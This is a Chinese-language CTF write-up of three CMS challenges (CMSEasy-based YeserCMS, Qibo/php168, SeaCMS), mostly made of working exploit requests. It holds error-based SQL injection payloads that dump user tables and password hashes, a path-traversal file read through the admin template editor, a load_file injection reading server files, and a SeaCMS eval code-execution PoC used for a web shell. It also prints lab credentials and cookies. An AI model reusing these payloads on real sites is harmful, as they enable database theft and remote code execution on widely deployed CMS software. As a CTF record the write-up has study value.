识别CMS方法
在线识别
工具识别
- CMSmap
- WhatWeb
关键信息
- github
- 备案号
- 水印logo
CMS漏洞查找
YeserCMS
识别CMS
点开一篇文章,在文章下面评论框中发现CMSEASY的水印,认定为CMSEASY
CMS漏洞
用乌云镜像查到一堆漏洞,也只能找看起来容易利用的来尝试,最终使用WooYun-2015-137013,这个报错注入漏洞成功利用
利用漏洞
// 乌云给出的利用方式,payload本身经过两次url编码,但本题进行测验时,发现并不需要进行url编码也可利用成功
POST /celive/live/header.php
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
// 两次url解码后,可看出是一个报错注入
POST /celive/live/header.php
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
// 数据库名
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(schema_name)) from information_schema.schemata),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
// 表名,发现前缀为Yesercms_
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(table_name)) from information_schema.tables where table_schema='Yeser'),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
// 猜测用户表为Yesercms_user
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
// 32位长度不够继续第二次
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from yesercms_user),20,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>
// 得到用户名以及密码hash,cmd5解密
admin::ff512d4240cbbdeafada404677ccbe61
admin::Yeser231
getshell失败
通过漏洞库找到的getshell方法都没用,也没办法用load_file注入读出网站目录下的flag.php
在管理界面中模板->当前模板编辑中可看到类似文件读取的功能,抓包发现,可能为文件包含
POST /index.php?case=template&act=fetch&admin_dir=admin&site=default HTTP/1.1
Host: 0ffa855eb139493c98d79cb36dc98fb21d3584a2d80242da.game.ichunqiu.com
Proxy-Connection: keep-alive
Content-Length: 29
Accept: application/json, text/javascript, */*
Origin: http://0ffa855eb139493c98d79cb36dc98fb21d3584a2d80242da.game.ichunqiu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://0ffa855eb139493c98d79cb36dc98fb21d3584a2d80242da.game.ichunqiu.com/index.php?case=template&act=edit&admin_dir=admin&site=default
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,da;q=0.8
Cookie: PHPSESSID=93d011f88a4d727ff86158d96926ef75;passinfo=%E5%85%8D%E8%B4%B9%E7%89%88+%3Ca+href%3D%22http%3A%2F%2Fwww.cmseasy.cn%2Fservice_1.html%22+target%3D%22_blank%22%3E%3Cfont+color%3D%22green%22%3E%28%E8%B4%AD%E4%B9%B0%E6%8E%88%E6%9D%83%29%3C%2Ffont%3E%3C%2Fa%3E; login_username=admin; login_password=a94f8d9844c391a79ae9db9aa41d2c44; style=skin2
&id=#archive_d_list_page_html
尝试更改id,获得flag
&id=#../../flag.php
再见CMS
识别CMS
- 通过备案号:京ICP备050453号,百度可知为
齐博cms
- 通过bugscaner扫描为:
php168
- 后来知道
php168
就是齐博cms
的前身(无奈…)
CMS漏洞
用乌云镜像查到一堆漏洞,发现这个CMS特别爱留后门,但尝试一堆无果,最终使用WooYun-2014-80259这个注入漏洞
利用漏洞
管理员的密码哈希cmd5查不到,直接利用load_file读出flag.php文件
POST /member/userinfo.php?job=edit&step=2 HTTP/1.1
Host: e33c7daf395f4333ad03ce19153b2085b4030edb27934599.game.ichunqiu.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,da;q=0.8
Cookie: passport=3%09xuanxuan%09UlZVW1ANBlUDU1cFCQAPAg4CUFkFCAYEV14CBgEGDVU%3Dfdf97d74d9; USR=dvy0cwef%0934%091521126941%09http%3A%2F%2Fe33c7daf395f4333ad03ce19153b2085b4030edb27934599.game.ichunqiu.com%2F
Content-Type: application/x-www-form-urlencoded
Content-Length: 159
truename=xxxx%0000&Limitword[000]=&email=xuanxuan@162.com&provinceid=,address=(select load_file(0x2F7661722F7777772F68746D6C2F666C61672E706870)) where uid=3%23
Test
识别CMS
直接看标识为:海洋CMS
CMS漏洞
- 漏洞时代:海洋CMS V6.28代码执行0day
- freebuf:漏洞预警:海洋CMS(SEACMS)0day漏洞预警,不过出题的时候还没有这篇文章
利用漏洞
POC:/search.php?searchtype=5&tid=&area=eval($_POST[1]) 菜刀链接,密码为1
翻到/var/www/html/data/common.inc.php
这个文件,拿到数据库信息,菜刀链接数据库拿flag
<?php
//数据库连接信息
$cfg_dbhost = '127.0.0.1';
$cfg_dbname = 'seacms';
$cfg_dbuser = 'sea_user';
$cfg_dbpwd = '46e06533407e';
$cfg_dbprefix = 'sea_';
$cfg_db_language = 'utf8';
?>